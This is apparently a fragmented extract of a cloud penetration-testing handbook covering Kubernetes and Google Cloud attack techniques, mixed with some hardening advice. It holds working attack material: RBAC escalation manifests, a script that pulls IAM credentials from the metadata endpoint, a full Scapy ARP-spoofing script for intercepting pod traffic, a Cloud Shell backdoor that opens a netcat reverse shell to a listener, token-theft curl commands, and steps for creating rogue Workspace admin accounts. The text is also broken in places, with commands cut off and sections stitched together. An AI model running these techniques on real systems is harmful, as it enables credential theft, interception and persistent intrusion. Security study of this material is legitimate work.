name: test-cr
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: alpine
namespace: default
spec:
selector:
matchLabels:
name: alpine
template:
metadata:
labels:
name: alpine
spec:
automountServiceAccountToken: false
hostNetwork: true
containers:
- name: alpine
image: alpine
command: ['/bin/sh']
args: ['-c', 'sleep 100']' | kubectl apply -f -
# Clean environment
kubectl delete clusterrolebindings test-crb
kubectl delete clusterrolebindings test-crb2
kubectl delete clusterrole test-cr
kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa
# Like the previous example, but in this case we try to use
RoleBindings
# instead of CLusterRoleBindings
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa2
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-cr
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["clusterrolebindings"]
verbs: ["get", "create"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["rolebindings"]
verbs: ["get", "create"]
- apiGroups: ["rbac.authorization.k8s.io/v1"]
resources: ["clusterroles"]
verbs: ["bind"]
resourceNames: ["admin","edit","view"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
namespace: default
subjects:
- kind: ServiceAccount
name: test-sa
namespace: default
roleRef:
kind: ClusterRole
name: test-cr
apiGroup: rbac.authorization.k8s.io
' | kubectl apply -f -
# Won't work
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb2
namespace: default
subjects:
- kind: ServiceAccount
name: test-sa2
namespace: default
roleRef:
kind: ClusterRole
name: admin
apiGroup: rbac.authorization.k8s.io
' | kubectl --as system:serviceaccount:default:test-sa apply -f
-
# Clean environment
kubectl delete rolebindings test-rb
kubectl delete rolebindings test-rb2
kubectl delete clusterrole test-cr
kubectl delete serviceaccount test-sa
kubectl delete serviceaccount test-sa2
Arbitrary roles creation
In this example we try to create a role having the permissions create and
path over the roles resources. However, K8s prevent us from creating a role
with more permissions the principal creating is has:
# Create a SA and give the permissions "create" and "patch"
over "roles"
echo 'apiVersion: v1
kind: ServiceAccount
metadata:
name: test-sa
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: test-r
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["roles"]
verbs: ["patch", "create", "get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test-rb
subjects:
- kind: ServiceAccount
name: test-sa
roleRef:
kind: Role
name: test-r
apiGroup: rbac.authorization.k8s.io
' | kubectl apply -f -
Here are some techniques you can try to escape to a different namespace:
For more info about which privileges you can abuse read:
abusing-roles-clusterroles-in-kubernetes
attacking-kubernetes-from-inside-a-pod.md
In the second step it was set the credentials of the GSA as secret of the
KSA. Then, if you can read that secret from inside the GKE cluster, you
can escalate to that GCP service account.
{ % code overflow="wrap" %}
{ % code overflow="wrap" %}
Create the GCP Service Account to impersonate from K8s with GCP
permissions:
{ % code overflow="wrap" %}
# Create SA called "gsa2ksa"
gcloud iam service-accounts create gsa2ksa --project=<project-
id>
{ % code overflow="wrap" %}
{ % code overflow="wrap" %}
# Allow the KSA to access the GSA in GCP IAM
gcloud iam service-accounts add-iam-policy-binding
gsa2ksa@<project-id.iam.gserviceaccount.com \
--role roles/iam.workloadIdentityUser \
--member "serviceAccount:<project-
id>.svc.id.goog[<namespace>/ksa2gcp]"
Run a pod with the KSA and check the access to GSA:
# If using Autopilot remove the nodeSelector stuff!
echo "apiVersion: v1
kind: Pod
metadata:
name: workload-identity-test
namespace: <namespace>
spec:
containers:
- image: google/cloud-sdk:slim
name: workload-identity-test
command: ['sleep','infinity']
serviceAccountName: ksa2gcp
nodeSelector:
iam.gke.io/gke-metadata-server-enabled: 'true'" | kubectl
apply -f-
# Check you can access the GSA from insie the pod with
curl -H "Metadata-Flavor: Google"
http://169.254.169.254/computeMetadata/v1/instance/service-
accounts/default/email
gcloud auth list
As an attacker inside K8s you should search for SAs with the
iam.gke.io/gcp-service-account annotation as that indicates that the
SA can access something in GCP. Another option would be to try to abuse
each KSA in the cluster and check if it has access.\ From GCP is always
interesting to enumerate the bindings and know which access are you
giving to SAs inside Kubernetes.
This is a script to easily iterate over the all the pods definitions looking
for that annotation:
First of all you need to configure which roles can be accessed inside the
namespace, and you do that with an annotation inside the namespace
object:
Kiam
kind: Namespace
metadata:
name: iam-example
annotations:
iam.amazonaws.com/permitted: ".*"
Kube2iam
apiVersion: v1
kind: Namespace
metadata:
annotations:
iam.amazonaws.com/allowed-roles: |
["role-arn"]
name: default
Once the namespace is configured with the IAM roles the Pods can have
you can indicate the role you want on each pod definition with
something like:
kind: Pod
metadata:
name: foo
namespace: external-id-example
annotations:
iam.amazonaws.com/role: reportingdb-reader
echo 'apiVersion: v1
kind: Pod
metadata:
annotations:
iam.amazonaws.com/role: transaction-metadata
name: alpine
namespace: eevee
spec:
containers:
- name: alpine
image: alpine
command: ["/bin/sh"]
args: ["-c", "sleep 100000"]' | kubectl apply -f -
1. First of all you need to create an OIDC provider for the cluster.
2. Then you create an IAM role with the permissions the SA will require.
3. Create a trust relationship between the IAM role and the SA name (or
the namespaces giving access to the role to all the SAs of the
namespace). The trust relationship will mainly check the OIDC
provider name, the namespace name and the SA name.
4. Finally, create a SA with an annotation indicating the ARN of the
role, and the pods running with that SA will have access to the token
of the role. The token is written inside a file and the path is specified
in AWS_WEB_IDENTITY_TOKEN_FILE (default:
/var/run/secrets/eks.amazonaws.com/serviceaccount/token )
{ % code overflow="wrap" %}
Moreover, if you are inside a pod, check for env variables like
AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN.
Sometimes the Turst Policy of a role might be bad configured and instead
of giving AssumeRole access to the expected service account, it gives it to
all the service accounts. Therefore, if you are capable of write an
annotation on a controlled service account, you can access the role.
aws-federation-abuse.md
You can use the following script to steal your new hard worked IAM role
credentials:
IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-
data/iam/security-credentials/ 2>/dev/null || wget
http://169.254.169.254/latest/meta-data/iam/security-
credentials/ -O - 2>/dev/null)
if [ "$IAM_ROLE_NAME" ]; then
echo "IAM Role discovered: $IAM_ROLE_NAME"
if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
echo "Credentials:"
curl "http://169.254.169.254/latest/meta-
data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null ||
wget "http://169.254.169.254/latest/meta-data/iam/security-
credentials/$IAM_ROLE_NAME" -O - 2>/dev/null
fi
fi
References
https://cloud.google.com/kubernetes-engine/docs/how-to/workload-
identity
https://medium.com/zeotap-customer-intelligence-unleashed/gke-
workload-identity-a-secure-way-for-gke-applications-to-access-gcp-
services-f880f4e74e8c
https://blogs.halodoc.io/iam-roles-for-service-accounts-2/
ARP
Generally speaking, pod-to-pod networking inside the node is available
via a bridge that connects all pods. This bridge is called “cbr0�?. (Some
network plugins will install their own bridge.) The cbr0 can also handle
ARP (Address Resolution Protocol) resolution. When an incoming packet
arrives at cbr0, it can resolve the destination MAC address using ARP.
This fact implies that, by default, every pod running in the same node is
going to be able to communicate with any other pod in the same node
(independently of the namespace) at ethernet level (layer 2).
DNS
In kubernetes environments you will usually find 1 (or more) DNS services
running usually in the kube-system namespace:
kubectl -n kube-system describe services
Name: kube-dns
Namespace: kube-system
Labels: k8s-app=kube-dns
kubernetes.io/cluster-service=true
kubernetes.io/name=KubeDNS
Annotations: prometheus.io/port: 9153
prometheus.io/scrape: true
Selector: k8s-app=kube-dns
Type: ClusterIP
IP Families: <none>
IP: 10.96.0.10
IPs: 10.96.0.10
Port: dns 53/UDP
TargetPort: 53/UDP
Endpoints: 172.17.0.2:53
Port: dns-tcp 53/TCP
TargetPort: 53/TCP
Endpoints: 172.17.0.2:53
Port: metrics 9153/TCP
TargetPort: 9153/TCP
Endpoints: 172.17.0.2:9153
In the previous info you can see something interesting, the IP of the service
is 10.96.0.10 but the IP of the pod running the service is 172.17.0.2.
If you check the DNS address inside any pod you will find something like
this:
cat /etc/resolv.conf
nameserver 10.96.0.10
However, the pod doesn't know how to get to that address because the pod
range in this case is 172.17.0.10/26.
Therefore, the pod will send the DNS requests to the address 10.96.0.10
which will be translated by the cbr0 to 172.17.0.2.
This means that a DNS request of a pod is always going to go the bridge
to translate the service IP to the endpoint IP, even if the DNS server is in
the same subnetwork as the pod.
Knowing this, and knowing ARP attacks are possible, a pod in a node is
going to be able to intercept the traffic between each pod in the
subnetwork and the bridge and modify the DNS responses from the DNS
server (DNS Spoofing).
Moreover, if the DNS server is in the same node as the attacker, the
attacker can intercept all the DNS request of any pod in the cluster
(between the DNS server and the bridge) and modify the responses.
ARP Spoofing in pods in the same
Node
Our goal is to steal at least the communication from the ubuntu-victim
to the mysql.
Scapy
python3 /tmp/arp_spoof.py
Enter Target IP:172.17.0.10 #ubuntu-victim
Enter Gateway IP:172.17.0.9 #mysql
Target MAC 02:42:ac:11:00:0a
Gateway MAC: 02:42:ac:11:00:09
Sending spoofed ARP responses
arp_spoof.py
#From
https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#
file-arpspoofer-py
from scapy.all import *
def getmac(targetip):
arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1,
pdst=targetip)
targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0]
[1].hwsrc
return targetmac
def main():
targetip= input("Enter Target IP:")
gatewayip= input("Enter Gateway IP:")
try:
targetmac= getmac(targetip)
print("Target MAC", targetmac)
except:
print("Target machine did not respond to ARP
broadcast")
quit()
try:
gatewaymac= getmac(gatewayip)
print("Gateway MAC:", gatewaymac)
except:
print("Gateway is unreachable")
quit()
try:
print("Sending spoofed ARP responses")
while True:
spoofarpcache(targetip, targetmac, gatewayip)
spoofarpcache(gatewayip, gatewaymac, targetip)
except KeyboardInterrupt:
print("ARP spoofing stopped")
restorearp(gatewayip, gatewaymac, targetip, targetmac)
restorearp(targetip, targetmac, gatewayip, gatewaymac)
quit()
if __name__=="__main__":
main()
ARPSpoof
In our scenario, download the tool in the attacker pod and create a **file
named hosts ** with the domains you want to spoof like:
cat hosts
google.com. 1.1.1.1
If you try to create your own DNS spoofing script, if you just modify the
the DNS response that is not going to work, because the response is going
to have a src IP the IP address of the malicious pod and won't be
accepted.\ You need to generate a new DNS packet with the src IP of the
DNS where the victim send the DNS request (which is something like
172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS
server ip, more about this in the introduction).
Capturing Traffic
The tool Mizu is a simple-yet-powerful API traffic viewer for Kubernetes
enabling you to view all API communication between microservices to
help your debug and troubleshoot regressions. It will install agents in the
selected pods and gather their traffic information and show you in a web
server. However, you will need high K8s permissions for this (and it's not
very stealthy).
References
https://www.cyberark.com/resources/threat-research-blog/attacking-
kubernetes-clusters-through-your-network-plumbing-part-1
https://blog.aquasec.com/dns-spoofing-kubernetes-clusters
Kube-bench
The tool kube-bench is a tool that checks whether Kubernetes is deployed
securely by running the checks documented in the CIS Kubernetes
Benchmark. You can choose to:
kubeaudit all
This tool also has the argument autofix to automatically fix detected
issues.
Popeye
Popeye is a utility that scans live Kubernetes cluster and reports potential
issues with deployed resources and configurations. It sanitizes your
cluster based on what's deployed and not what's sitting on disk. By scanning
your cluster, it detects misconfigurations and helps you to ensure that best
practices are in place, thus preventing future headaches. It aims at reducing
the cognitive _over_load one faces when operating a Kubernetes cluster in
the wild. Furthermore, if your cluster employs a metric-server, it reports
potential resources over/under allocations and attempts to warn you should
your cluster run out of capacity.
Kicks
KICS finds security vulnerabilities, compliance issues, and infrastructure
misconfigurations in the following Infrastructure as Code solutions:
Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm,
Microsoft ARM, and OpenAPI 3.0 specifications
Checkov
Checkov is a static code analysis tool for infrastructure-as-code.
kubernetes-securitycontext-s.md
Tips:
Close ports.
Avoid Anonymous access.
NodeRestriction; No access from specific nodes to the API.
https://kubernetes.io/docs/reference/access-authn-
authz/admission-controllers/#noderestriction
Basically prevents kubelets from adding/removing/updating
labels with a node-restriction.kubernetes.io/ prefix. This label
prefix is reserved for administrators to label their Node objects
for workload isolation purposes, and kubelets will not be allowed
to modify labels with that prefix.
And also, allows kubelets to add/remove/update these labels and
label prefixes.
Ensure with labels the secure workload isolation.
Avoid specific pods from API access.
Avoid ApiServer exposure to the internet.
Avoid unauthorized access RBAC.
ApiServer port with firewall and IP whitelisting.
SecurityContext Hardening
By default root user will be used when a Pod is started if no other user is
specified. You can run your application inside a more secure context using a
template similar to the following one:
apiVersion: v1
kind: Pod
metadata:
name: security-context-demo
spec:
securityContext:
runAsUser: 1000
runAsGroup: 3000
fsGroup: 2000
volumes:
- name: sec-ctx-vol
emptyDir: {}
containers:
- name: sec-ctx-demo
image: busybox
command: [ "sh", "-c", "sleep 1h" ]
securityContext:
runAsNonRoot: true
volumeMounts:
- name: sec-ctx-vol
mountPath: /data/demo
securityContext:
allowPrivilegeEscalation: true
https://kubernetes.io/docs/tasks/configure-pod-container/security-
context/
https://kubernetes.io/docs/concepts/policy/pod-security-policy/
Kubernetes NetworkPolicies
kubernetes-networkpolicies.md
General Hardening
You should update your Kubernetes environment as frequently as necessary
to have:
Dependencies up to date.
Bug and security patches.
Scenario Information
This scenario is deploy a simple network security policy for Kubernetes
resources to create security boundaries.
Scenario Solution
The below scenario is from https://github.com/ahmetb/kubernetes-
network-policy-recipes
If you want to control traffic flow at the IP address or port level (OSI layer
3 or 4), then you might consider using Kubernetes NetworkPolicies for
particular applications in your cluster. NetworkPolicies are an application-
centric construct which allow you to specify how a pod is allowed to
communicate with various network "entities" (we use the word "entity" here
to avoid overloading the more common terms such as "endpoints" and
"services", which have specific Kubernetes connotations) over the network.
The entities that a Pod can communicate with are identified through a
combination of the following 3 identifiers
1. Other pods that are allowed (exception: a pod cannot block access to
itself) Namespaces that are allowed
2. IP blocks (exception: traffic to and from the node where a Pod is
running is always allowed, regardless of the IP address of the Pod or
the node)
3. When defining a pod- or namespace- based NetworkPolicy, you use a
selector to specify what traffic is allowed to and from the Pod(s) that
match the selector.
Use Cases:
Try it out
Run a test container again, and try to query web
Traffic dropped
Remarks
In the manifest above, we target Pods with app=web label to policy the
network. This manifest file is missing the spec.ingress field. Therefore
it is not allowing any traffic into the Pod.
If you create another NetworkPolicy that gives some Pods access to
this application directly or indirectly, this NetworkPolicy will be
obsolete.
If there is at least one NetworkPolicy with a rule allowing the traffic, it
means the traffic will be routed to the pod regardless of the policies
blocking the traffic.
Cleanup
allowPrivilegeEscalation to False
Do not add sensitive capabilities (and remove the ones you don't
need)
privileged to False
If possible, set readOnlyFilesystem as True
Set runAsNonRoot to True and set a runAsUser
If possible, consider limiting permissions indicating seLinuxOptions
and seccompProfile
Do NOT give privilege group access via runAsGroup.
Scenario Information
This scenario is deploy runtime security monitoring & detection for
containers and kubernetes resources.
To get started with this scenario you can deploy the below helm chart
with version 3
NOTE: Make sure you run the follwing deployment using Helm with
v3.
Scenario Solution
Falco , the cloud-native runtime security project, is the de facto
Kubernetes threat detection engine. Falco was created by Sysdig in
2016 and is the first runtime security project to join CNCF as an
incubation-level project. Falco detects unexpected application behavior
and alerts on threats at runtime.
Falco ships with a default set of rules that check the kernel for unusual
behavior such as:
Now, let's spin up a hacker container and read senstive file and see if
that detects by Falco
cat /etc/shadow
gcp-basic-information.md
Labs to learn
https://gcpgoat.joshuajebaraj.com/
https://github.com/ine-labs/GCPGoat
https://github.com/carlospolop/gcp_privesc_scripts
GCP Pentester/Red Team
Methodology
In order to audit a GCP environment it's very important to know: which
services are being used, what is being exposed, who has access to what,
and how are internal GCP services an external services connected.
From a Red Team point of view, the first step to compromise a GCP
environment is to manage to obtain some credentials. Here you have some
ideas on how to do that:
C:\Users\USERNAME\.config\gcloud\*
gcp-unauthenticated-enum
Or if you are doing a review you could just ask for credentials with these
roles:
gcp-permissions-for-a-pentest.md
After you have managed to obtain credentials, you need to know to who do
those creds belong, and what they have access to, so you need to perform
some basic enumeration:
Basic Enumeration
SSRF
For more information about how to enumerate GCP metadata check the
following hacktricks page:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf#6440
Whoami
In AWS you can use the service STS to know to who does the API keys
belong to, in GCP there isn't anything like that, but just reading the email
you might find interesting information.
Org Enumeration
IAM Enumeration
If you have enough permissions checking the privileges of each entity
inside the GCP account will help you understand what you and other
identities can do and how to escalate privileges.
If you don't have enough permissions to enumerate IAM, you can steal
brute-force them to figure them out.\ Check how to do the numeration
and brute-forcing in:
gcp-iam-and-org-policies-enum.md
Now that you have some information about your credentials (and if you
are a red team hopefully you haven't been detected). It's time to figure out
which services are being used in the environment.\ In the following section
you can check some ways to enumerate some common services.
Groups Enumeration
With the permissions serviceusage.services.enable and
serviceusage.services.use it's possible to enable services in a project
and use them. You could enable the service
cloudidentity.googleapli.com if disabled and user it to enumerate
groups (like it's done in PurplePanda in here):
You could also enable the admin service and if you user has enough
privileges in Workspace you could enumerate all groups with:
gcloud services enable admin.googleapis.com
gcloud beta identity groups preview --customer <workspace-id>
Services Enumeration, Post-
Exploitation & Persistence
GCP has an astonishing amount of services, in the following page you will
find basic information, enumeration cheatsheets, how to avoid detection,
obtain persistence, and other post-exploitation tricks about some of them:
gcp-services
gcp-non-svc-persistance.md
Note that you don't need to perform all the work manually, below in this
post you can find a section about automatic tools.
gcp-unauthenticated-enum
Privilege Escalation
The most common way once you have obtained some cloud credentials or
have compromised some service running inside a cloud is to abuse
misconfigured privileges the compromised account may have. So, the first
thing you should do is to enumerate your privileges.
gcp-privilege-escalation
Publicly Exposed Services
While enumerating GCP services you might have found some of them
exposing elements to the Internet (VM/Containers ports, databases or
queue services, snapshots or buckets...).\ As pentester/red teamer you
should always check if you can find sensitive information / vulnerabilities
on them as they might provide you further access into the AWS account.
In this book you should find information about how to find exposed AWS
services and how to check them. About how to find vulnerabilities in
exposed network services I would recommend you to search for the
specific service in:
https://book.hacktricks.xyz/
Automatic Tools
In the GCloud console, in https://console.cloud.google.com/iam-
admin/asset-inventory/dashboard you can see resources and IAMs
being used by project.
Here you can see the assets supported by this API:
https://cloud.google.com/asset-inventory/docs/supported-asset-
types
Check tools that can be used in several clouds here.
**[gcp_scanner](https://github.com/google/gcp_scanner): This is a
GCP resource scanner that can help determine what level of access
certain credentials posses** on GCP.
# Install
git clone https://github.com/google/gcp_scanner.git
cd gcp_scanner
virtualenv -p python3 venv
source venv/bin/activate
pip install -r requirements.txt
# Execute with gcloud creds
python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
# Back to normal
gcloud config unset proxy/address
gcloud config unset proxy/port
gcloud config unset proxy/type
gcloud config unset auth/disable_ssl_validation
gcloud config unset core/custom_ca_certs_file
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/
Organization
--> Folders
--> Projects
--> Resources
Organization Policies
It's possible to migrate a project without any organization to an
organization with the permissions
roles/resourcemanager.projectCreator and
roles/resourcemanager.projectMover . If the project is inside other
organization, it's needed to contact GCP support to move them out of the
organization first. For more info check this.
IAM Roles
There are three types of roles in IAM:
The IAM policies indicates the permissions principals has over resources
via roles which are assigned granular permissions. Organization policies
restrict how those service can be used or which features are enabled
disabled. This helps in order to improve the least privilege of each resource
in the gcp environment.
gcp-iam-and-org-policies-enum.md
Users & Groups
In GCP console there isn't any Users or Groups management, that is done
in Google Workspace. Although you could synchronize a different identity
provider in Google Workspace.
You can also search here predefined roles offered by each product.
grp-gcp-
network-
admins Creating networks, subnets, firewall rules, and
(required for network devices such as Cloud Router, Cloud VPN,
checklist) and cloud load balancers.
grp-gcp-
billing-
admins Setting up billing accounts and monitoring their
(required for usage.
checklist)
grp-gcp-
developers
(required for Designing, coding, and testing applications.
checklist)
grp-gcp-
network- Reviewing network configurations.
viewer
grp-gcp-
audit-viewer Viewing audit logs.
grp-gcp-scc-
admin Administering Security Command Center.
grp-gcp-
secrets- Managing secrets in Secret Manager.
admin
Service accounts
You can try the following command to specifically enumerate roles
assigned to your service account project-wide in the current project:
More generally, you can shorten the command to the following to get an
idea of the roles assigned project-wide to all members.
[email protected]
[email protected]
Or to see the IAM policy assigned to a single Compute Instance you can try
the following.
A custom service account will look like this:
SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
set account [ACCOUNT] while trying the various tasks in this blog.
Terraform IAM Policies, Bindings and
Memberships
Access scopes
As defined by terraform in
https://registry.terraform.io/providers/hashicorp/google/latest/docs/resource
s/google_project_iam using terraform with GCP there are different ways to
grant a principal access over a resource:
You can see what scopes are assigned by querying the metadata URL.
Here is an example from a VM with "default" access assigned:
$ curl
http://metadata.google.internal/computeMetadata/v1/instance/ser
vice-accounts/default/scopes
-H 'Metadata-Flavor:Google'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append
The most interesting thing in the default scope is devstorage.read_only .
This grants read access to all storage buckets in the project. This can be
devastating, which of course is great for us as an attacker.
curl
http://metadata.google.internal/computeMetadata/v1/instance/ser
vice-accounts/default/scopes -H 'Metadata-Flavor:Google'
https://www.googleapis.com/auth/cloud-platform
It is possible to encounter some conflicts when using both IAM and access
scopes. For example, your service account may have the IAM role of
compute.instanceAdmin but the instance you've breached has been
crippled with the scope limitation of
https://www.googleapis.com/auth/compute.readonly . This would
prevent you from making any changes using the OAuth token that's
automatically assigned to your instance.
IAM Roles
There are three types of roles in IAM:
You can also search here predefined roles offered by each product.
Basic roles
Name Title Permissions
Permissions for read-only actions that do
roles/viewer Viewer not affect state, such as viewing (but not
modifying) existing resources or data.
All viewer permissions, plus permissions
roles/editor Editor for actions that modify state, such as
changing existing resources.
All Editor permissions and permissions for
the following actions:
Manage roles and permissions for a
roles/owner Owner
project and all resources within the
project.
Set up billing for a project.
PROJECT=$(curl
http://metadata.google.internal/computeMetadata/v1/project/proj
ect-id
-H "Metadata-Flavor: Google" -s)
ACCOUNT=$(curl
http://metadata.google.internal/computeMetadata/v1/instance/ser
vice-accounts/default/email
-H "Metadata-Flavor: Google" -s)
gcloud projects get-iam-policy $PROJECT \
--flatten="bindings[].members" \
--format='table(bindings.role)' \
--filter="bindings.members:$ACCOUNT"
Don't worry too much if you get denied access to the command above. It's
still possible to work out what you can do simply by trying to do it.
More generally, you can shorten the command to the following to get an
idea of the roles assigned project-wide to all members.
Or to see the IAM policy assigned to a single Compute Instance you can try
the following.
You can retrieve and inspect the token with the following curl command:
curl
"http://metadata.google.internal/computeMetadata/v1/instance/se
rvice-accounts/default/token"
-H "Metadata-Flavor: Google"
{
"access_token":"ya29.AHES6ZRN3-
HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
"expires_in":3599,
"token_type":"Bearer"
}
This token is the combination of the service account and access scopes
assigned to the Compute Instance. So, even though your service account
may have every IAM privilege imaginable, this particular OAuth token
might be limited in the APIs it can communicate with due to access
scopes.
When using one of Google's official GCP client libraries, the code will
automatically go searching for credentials following a strategy called
Application Default Credentials.
1. First, it will check would be the source code itself. Developers can
choose to statically point to a service account key file.
2. The next is an environment variable called
GOOGLE_APPLICATION_CREDENTIALS . This can be set to point to a
service account key file.
3. Finally, if neither of these are provided, the application will revert to
using the default token provided by the metadata server as
described in the section above.
Finding the actual JSON file with the service account credentials is
generally much more desirable than relying on the OAuth token on the
metadata server. This is because the raw service account credentials can be
activated without the burden of access scopes and without the short
expiration period usually applied to the tokens.
Terraform IAM Policies, Bindings and
Memberships
As defined by terraform in
https://registry.terraform.io/providers/hashicorp/google/latest/docs/resource
s/google_project_iam using terraform with GCP there are different ways to
grant a principal access over a resource:
Create the Service Account to access from github actions with the
desired permissions:
projectId=FIXME
gcloud config set project $projectId
# Give permissions to SA
gitHubRepoName="repo-org/repo-name"
gcloud iam service-accounts add-iam-policy-binding $saId \
--role "roles/iam.workloadIdentityUser" \
--member
"principalSet://iam.googleapis.com/${poolId}/attribute.${attrib
uteMappingScope}/${gitHubRepoName}"
Note how in the previous member we are specifying the org-name/repo-
However it's also possible to allow all github to access the service account
creating a provider such the following using a wildcard:
# Create a Workload Identity Pool
poolName=wi-pool2
attribute.
{custom_attribute} : principalSet://iam.googleapis.com/projects/{pro
ject}/locations/{location}/workloadIdentityPools/{pool}/attribute.
{custom_attribute}/{value}
Github
Remember to change ${providerId} and ${saId} for their respective
values:
name: Check GCP action
on:
workflow_dispatch:
pull_request:
branches:
- main
permissions:
id-token: write
jobs:
Get_OIDC_ID_token:
runs-on: ubuntu-latest
steps:
- id: 'auth'
name: 'Authenticate to GCP'
uses: 'google-github-actions/[email protected]'
with:
create_credentials_file: 'true'
workload_identity_provider: '${providerId}'
service_account: '${saId}'
- id: 'gcloud'
name: 'gcloud'
run: |-
gcloud auth login --brief --cred-file="${ {
steps.auth.outputs.credentials_file_path }}"
gcloud auth list
gcloud projects list
You can access Google's Cloud Shell from the web console or running
gcloud cloud-shell ssh .
1. Any Google user with access to Google Cloud has access to a fully
authenticated Cloud Shell instance.
2. Said instance will maintain its home directory for at least 120 days
if no activity happens.
3. There is no capabilities for an organisation to monitor the activity
of that instance.
This basically means that an attacker may put a backdoor in the home
directory of the user and as long as the user connects to the GC Shell every
120days at least, the backdoor will survive and the attacker will get a shell
everytime it's run just by doing:
that, if exists, is going to be executed everytime the user access the cloud
shell (like in the previous technique). Just insert the previous backdoor or
one like the following to maintain persistence as long as the user uses
"frequently" the cloud shell:
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
Note that the first time an action is performed in Cloud Shell that
requires authentication, it pops up an authorization window in the user’s
browser that must be accepted before the command runs. If an unexpected
pop-up comes up, a target could get suspicious and burn the persistence
method.
Moreover, notice that from the host you can find a service account token:
This is because by default you will be able to use the refresh token as
long as you want to generate new tokens.
To get a new refreshed access token with the refresh token, client ID, and
client secret run:
curl -s --data client_id=<client_id> --data client_secret=
<client_secret> --data grant_type=refresh_token --data
refresh_token=<refresh_token> --data
scope="https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/accounts.reauth"
https://www.googleapis.com/oauth2/v4/token
Service Accounts
Just like with authenticated users, if you manage to compromise the
private key file of a service account you will be able to access it usually as
long as you want.\ However, if you steal the OAuth token of a service
account this can be even more interesting, because, even if by default these
tokens are useful just for an hour, if the victim deletes the private api key,
the OAuh token will still be valid until it expires.
Metadata
Obviously, as long as you are inside a machine running in the GCP
environment you will be able to access the service account attached to
that machine contacting the metadata endpoint (note that the Oauth
tokens you can access in this endpoint are usually restricted by scopes).
Remediations
Some remediations for these techniques are explained in
https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-
cloud-part-2
Bypassing access scopes
When access scopes are used, the OAuth token that is generated for the
computing instance (VM) will have a scope limitation included. However,
you might be able to bypass this limitation and exploit the permissions the
compromised account has.
The best way to bypass this restriction is either to find new credentials in
the compromised host, to find the service key to generate an OUATH
token without restriction or to jump to a different VM less restricted.
It's possible that another box in the environment exists with less restrictive
access scopes. If you can view the output of gcloud compute instances
list --quiet --format=json , look for instances with either the specific
scope you want or the auth/cloud-platform all-inclusive scope.
Also keep an eye out for instances that have the default service account
assigned ( [email protected] ).
Check if any service account has exported a key at some point with:
Or, if generated from the CLI they will look like this:
{
"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-
ACCOUNT-EMAIL]/keys/[KEY-ID]",
"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE",
"privateKeyData": "[PRIVATE-KEY]",
"validAfterTime": "[DATE]",
"validBeforeTime": "[DATE]",
"keyAlgorithm": "KEY_ALG_RSA_2048"
}
If you do find one of these files, you can tell the gcloud command to re-
authenticate with this service account. You can do this on the instance, or
on any machine that has the tools installed.
gcloud auth activate-service-account --key-file [FILE]
Workspace has its own API, completely separate from GCP. Permissions
are granted to Workspace and there isn't any default relation between
GCP and Workspace.
This topic is a bit tricky… your service account has something called a
"client_email" which you can see in the JSON credential file you export. It
probably looks something like account-name@project-
Gitlab've created this Python script that can do two things - list the user
directory and create a new administrative account. Here is how you would
use it:
# Validate access only
./gcp_delegation.py --keyfile ./credentials.json \
--impersonate [email protected] \
--domain target-org.com
You can try this script across a range of email addresses to impersonate
various users. Standard output will indicate whether or not the service
account has access to Workforce, and will include a random password for
the new admin account if one is created.
If you have success creating a new admin account, you can log on to the
Google admin console and have full control over everything in G Suite for
every user - email, docs, calendar, etc. Go wild.
References
https://89berner.medium.com/persistant-gcp-backdoors-with-googles-
cloud-shell-2f75c83096ec
https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-
cloud-part-1
https://securityintelligence.com/posts/attacker-achieve-persistence-
google-cloud-platform-cloud-shell/
From
https://github.com/carlospolop/PurplePanda/tree/master/intel/go
ogle#permissions-configuration
roles/bigquery.metadataViewer
roles/composer.user
roles/compute.viewer
roles/container.clusterViewer
roles/iam.securityReviewer
roles/resourcemanager.folderViewer
roles/resourcemanager.organizationViewer
roles/secretmanager.viewer
ScoutSuite
From https://github.com/nccgroup/ScoutSuite/wiki/Google-Cloud-
Platform#permissions
roles/Viewer
roles/iam.securityReviewer
roles/stackdriver.accounts.viewer
CloudSploit
From
https://github.com/aquasecurity/cloudsploit/blob/master/docs/gc
p.md#cloud-provider-configuration
includedPermissions:
- cloudasset.assets.listResource
- cloudkms.cryptoKeys.list
- cloudkms.keyRings.list
- cloudsql.instances.list
- cloudsql.users.list
- compute.autoscalers.list
